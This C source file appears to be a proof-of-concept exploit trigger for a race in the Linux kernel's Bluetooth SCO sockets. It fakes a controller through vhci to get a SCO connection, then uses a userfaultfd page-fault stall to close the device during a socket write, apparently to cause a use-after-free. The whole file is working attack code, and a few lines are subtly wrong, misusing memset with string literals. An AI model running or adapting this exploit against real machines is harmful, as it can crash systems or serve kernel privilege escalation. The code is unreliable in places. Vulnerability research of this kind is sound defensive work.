#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/sco.h>
#include <stdint.h>

#include <sys/xattr.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/userfaultfd.h>
#include <sys/types.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <poll.h>
#include <stdint.h>

#include "syzkaller_utils.h"

static int page_size;
int fd;
int procfd;

struct vparam vp;

#define errExit(s) do { perror(s); exit(-1); } while(0);

void dump_hex(char* buf, int len)
{
    printf("---------------------------------------------------\n");
    int STEP = 16;
    int CURSOR = 0;
    for(; len > 0; len -= STEP) {
        for(int i = 0; i < STEP && i < len; i++) {
            printf("%02x ", buf[CURSOR++] & 0xff);
        }
        printf("\n");
    }
    printf("\n");
}

void dump_cmd_data(char* buf, int len)
{
    struct hci_command_hdr* p = buf + 1;
    printf("[DUMP] command opcode: %x\n", p->opcode);
    dump_hex(buf, len);
}

void reply_wrapper(int fd, char* buf, ssize_t buf_size)
{
    // printf("---------------------------------------------------\n");
    // struct hci_command_hdr* p = buf + 1;
    // printf("[DUMP] reply: %x\n", p->opcode);
    // int STEP = 16;
    // int CURSOR = 0;
    // for(; buf_size > 0; buf_size -= STEP) {
    //     for(int i = 0; i < STEP && i < buf_size; i++) {
    //         printf("%02x ", buf[CURSOR++] & 0xff);
    //     }
    //     printf("\n");
    // }
    if (write(fd, buf, buf_size) < 0) errExit("write wrapper");
}

static bool sco_process_command_pkt(int fd, char* buf, ssize_t buf_size)
{
    struct hci_command_hdr* hdr = (struct hci_command_hdr*)buf;
    if (buf_size < (ssize_t)sizeof(struct hci_command_hdr) ||
        hdr->plen != buf_size - sizeof(struct hci_command_hdr)) {
            errExit("malformed pkt");
    }

    char reply[1024] = {0};
    switch (hdr->opcode) {
        case HCI_OP_CREATE_CONN: {
            // Command Status
            reply[0] = HCI_EVENT_PKT;
            struct hci_event_hdr* _hdr = reply + 1;
            _hdr->evt = HCI_EV_CMD_STATUS; // evt;
            _hdr->plen = 0x4;// plen;
            struct hci_ev_cmd_status* status = reply + 3;
            status->ncmd = 0x01;
            status->opcode = HCI_OP_CREATE_CONN;
            status->status = 0x0;
            reply_wrapper(fd, reply, 7);

            // Connect Complete
            memset(reply, 0, sizeof(reply));
            reply[0] = HCI_EVENT_PKT;
            struct hci_event_hdr* hdr = reply + 1;
            hdr->evt = HCI_EV_CONN_COMPLETE;
            hdr->plen = 11;
            struct hci_ev_conn_complete* cmp = reply + 3;
            cmp->status = 0x0;
            cmp->handle = 0x4a;
            cmp->link_type = 0x1; // ACL;
            cmp->encr_mode = 0x0;
            memset(&cmp->bdaddr, 0xbb, 6);
            reply_wrapper(fd, reply, 14);
            // what ACL data ???
            return false;
        }
        case HCI_OP_READ_REMOTE_FEATURES: {
            // Command Status
            reply[0] = HCI_EVENT_PKT;
            struct hci_event_hdr* _hdr = reply + 1;
            _hdr->evt = HCI_EV_CMD_STATUS; // evt;
            _hdr->plen = 0x4;// plen;
            struct hci_ev_cmd_status* status = reply + 3;
            status->ncmd = 0x01;
            status->opcode = HCI_OP_READ_REMOTE_FEATURES;
            status->status = 0x0;
            reply_wrapper(fd, reply, 7);

            // HCI_EV_REMOTE_FEATURES
            memset(reply, 0, sizeof(reply));
            reply[0] = HCI_EVENT_PKT;
            _hdr = reply + 1;
            _hdr->evt = HCI_EV_REMOTE_FEATURES;
            _hdr->plen = 11;
            struct hci_ev_remote_features* feat = reply + 3;
            feat->status = 0x0;
            feat->handle = 0x4a;
            memset(&feat->features, "\xa4\x08\x00\xc0\x18\x1e\x79\x83", 8);
            reply_wrapper(fd, reply, 14);
            return false;
        }
        case HCI_OP_SETUP_SYNC_CONN: {
            // Command Status
            reply[0] = HCI_EVENT_PKT;
            struct hci_event_hdr* _hdr = reply + 1;
            _hdr->evt = HCI_EV_CMD_STATUS; // evt;
            _hdr->plen = 0x4;// plen;
            struct hci_ev_cmd_status* status = reply + 3;
            status->ncmd = 0x01;
            status->opcode = HCI_OP_SETUP_SYNC_CONN;
            status->status = 0x0;
            reply_wrapper(fd, reply, 7);

            // Synchronous Connect Complete
            memset(reply, 0, sizeof(reply));
            reply[0] = HCI_EVENT_PKT;
            _hdr = reply + 1;
            _hdr->evt = HCI_EV_SYNC_CONN_COMPLETE;
            _hdr->plen = 17;
            struct hci_ev_sync_conn_complete* cmp = reply + 3;
            cmp->status = 0x0;
            cmp->handle = 0x4b;
            cmp->air_mode = 0x01; // LMP_CVSD
            cmp->link_type = 0x02; // ESCO_LINK
            cmp->retrans_window = 0x0; // ?
            cmp->tx_interval = 0x0; 
            cmp->tx_pkt_len = 0x0;
            cmp->rx_pkt_len = 0x0;
            memset(&cmp->bdaddr, 0xbb, 6);
            reply_wrapper(fd, reply, 20);
            return false;
        }
        case HCI_OP_READ_REMOTE_EXT_FEATURES: {
            // Command Status
            reply[0] = HCI_EVENT_PKT;
            struct hci_event_hdr* _hdr = reply + 1;
            _hdr->evt = HCI_EV_CMD_STATUS; // evt;
            _hdr->plen = 0x4;// plen;
            struct hci_ev_cmd_status* status = reply + 3;
            status->ncmd = 0x01;
            status->opcode = HCI_OP_READ_REMOTE_EXT_FEATURES;
            status->status = 0x0;
            reply_wrapper(fd, reply, 7);

            // HCI_EV_REMOTE_EXT_FEATURES
            memset(reply, 0, sizeof(reply));
            reply[0] = HCI_EVENT_PKT;
            _hdr = reply + 1;
            _hdr->evt = HCI_EV_REMOTE_EXT_FEATURES;
            _hdr->plen = 13;
            struct hci_ev_remote_ext_features* feat = reply + 3;
            feat->status = 0x0;
            feat->handle = 0x4a;
            feat->max_page = 1;
            feat->page = 1;
            memset(&feat->features, 0, 8);
            reply_wrapper(fd, reply, 16);
            return false;
        }
        case HCI_OP_REMOTE_NAME_REQ: {
            // Command Status
            reply[0] = HCI_EVENT_PKT;
            struct hci_event_hdr* _hdr = reply + 1;
            _hdr->evt = HCI_EV_CMD_STATUS; // evt;
            _hdr->plen = 0x4;// plen;
            struct hci_ev_cmd_status* status = reply + 3;
            status->ncmd = 0x01;
            status->opcode = HCI_OP_REMOTE_NAME_REQ;
            status->status = 0x0;
            reply_wrapper(fd, reply, 7);

            // HCI_EV_REMOTE_NAME
            memset(reply, 0, sizeof(reply));
            reply[0] = HCI_EVENT_PKT;
            _hdr = reply + 1;
            _hdr->evt = HCI_EV_REMOTE_NAME;
            _hdr->plen = 255;
            struct hci_ev_remote_name* name = reply + 3;
            name->status = 0x0;
            memset(&name->bdaddr, 0xbb, 6);
            memset(&name->name, "AAA", 3);
            reply_wrapper(fd, reply, 258);
            return false;
        }
/*
	if (!status) {
		if (lmp_esco_capable(conn->hdev))
			hci_setup_sync(sco, conn->handle);
		else
			hci_add_sco(sco, conn->handle);
	} else {
		hci_connect_cfm(sco, status);
		hci_conn_del(sco);
	}

    Because local device features = empty;
    Hence hci_add_sco is called
    Sad, we don't know how to react with this command, no trace here
 */
        default:
            printf("???\n");
            return false;
            // ???
    }
}

void* connected_thread(void* param)
{
    // answer some packets to make sure connection is done
    while(1) {
        char buf[1024] = {0};
        ssize_t buf_size = read(vp.fd, buf, sizeof(buf));
        if (buf_size < 0) errExit("read buf");
        if (buf_size > 0 && buf[0] == HCI_COMMAND_PKT) {
            dump_cmd_data(buf, buf_size);
            if (sco_process_command_pkt(vp.fd, buf + 1, buf_size - 1))
                break;
        }
        else if (buf_size > 0 && buf[0] == HCI_ACLDATA_PKT) {
            dump_hex(buf, buf_size); // L2CAP_INFO_REQ ...
                                     // werid
            // don't care here
            // errExit("miss handled ACL data packet\n");
            
            // let ACL be our break
            break; 
        }
        else if (buf_size > 0 && buf[0] == HCI_SCODATA_PKT) {
            dump_hex(buf, buf_size);
            errExit("miss handled SCO data packet\n");
        }
    }
}

static void *
fault_handler_thread(void *arg)
{
    static struct uffd_msg msg;   /* Data read from userfaultfd */
    static int fault_cnt = 0;     /* Number of faults so far handled */
    long uffd;                    /* userfaultfd file descriptor */
    static char *page = NULL;
    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = (long) arg;

    /* Create a page that will be copied into the faulting region */

    if (page == NULL) {
        page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED)
            errExit("mmap");
    }

    for (;;) {

        /* See what poll() tells us about the userfaultfd */

        struct pollfd pollfd;
        int nready;
        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);
        if (nready == -1)
            errExit("poll");

        /* Read an event from the userfaultfd */

        nread = read(uffd, &msg, sizeof(msg));
        if (nread == 0) {
            printf("EOF on userfaultfd!\n");
            exit(EXIT_FAILURE);
        }

        if (nread == -1)
            errExit("read");

        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            fprintf(stderr, "Unexpected event on userfaultfd\n");
            exit(EXIT_FAILURE);
        }

        /* Copy the page pointed to by 'page' into the faulting
           region. Vary the contents that are copied in, so that it
           is more obvious that each fault is handled separately. */

        if (msg.arg.pagefault.flags & UFFD_PAGEFAULT_FLAG_WRITE) {
            printf("[*] write fault\n");
            struct uffdio_range range;
            range.start = msg.arg.pagefault.address & ~(page_size - 1);
            range.len = page_size;
            if (ioctl(uffd, UFFDIO_UNREGISTER, &range) == -1)
                errExit("ioctl-UFFDIO_UNREGISTER");
            if (ioctl(uffd, UFFDIO_WAKE, &range) == -1)
                errExit("ioctl-UFFDIO_WAKE");
        } else {
            printf("[*] read fault\n");

            // that's we want, let's close the device here
            close(vp.fd);

            // we wait a while to ensure the close is done?
            usleep(500);

            *(unsigned long int *)page = 0;
            memcpy(page, "Hello World!", strlen("Hello World!"));

            fault_cnt++;

            uffdio_copy.src = (unsigned long) page;

            uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
                                                ~(page_size - 1);
            uffdio_copy.len = page_size;
            uffdio_copy.mode = 0;
            uffdio_copy.copy = 0;
            if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
                errExit("ioctl-UFFDIO_COPY");
        }
    }
}

int main(int argc, char* argv[])
{
    // awaked controller
    vp = initialize_vhci();

    // allocate a SCO socket
    int scosock = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_SCO);
    
    // bind to controller
    struct sockaddr_sco local_addr = {0};
    local_addr.sco_family = AF_BLUETOOTH;
    memset(&local_addr.sco_bdaddr, 0xaa, 6);
    if (bind(scosock, (struct sockaddr *)&local_addr, sizeof(local_addr)) < 0) errExit("bind");

    // get connected SCO socket
    pthread_t th;
    pthread_create(&th, NULL, connected_thread, NULL);
    struct sockaddr_sco remote_addr = {0};
    remote_addr.sco_family = AF_BLUETOOTH;
    memset(&remote_addr.sco_bdaddr, 0xbb, 6);
    int status = connect(scosock, (struct sockaddr *)&remote_addr, sizeof(remote_addr));
    if (status) errExit("connect");
    pthread_join(th, NULL);

    // sco sendmsg and hang
    // using userfaultfd
    printf("start attack!");
    // 1. Setup userfaultfd

    long uffd;          /* userfaultfd file descriptor */
    char *addr;         /* Start of region handled by userfaultfd */
    unsigned long len;  /* Length of region handled by userfaultfd */
    pthread_t thr;      /* ID of thread that handles page faults */
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    int s;

    page_size = sysconf(_SC_PAGE_SIZE);
    len = 1 * page_size;

    /* Create and enable userfaultfd object */

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) errExit("userfaultfd");

    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
       errExit("ioctl-UFFDIO_API");

    addr = mmap(NULL, len, PROT_READ | PROT_WRITE,
               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (addr == MAP_FAILED)
       errExit("mmap");

    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
       errExit("ioctl-UFFDIO_REGISTER");

    s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
    if (s != 0) {
       errno = s;
       errExit("pthread_create");
    }

    write(scosock, addr, 16); // triggeer pagef ault

    while(1) {} // wait

    return 0;
}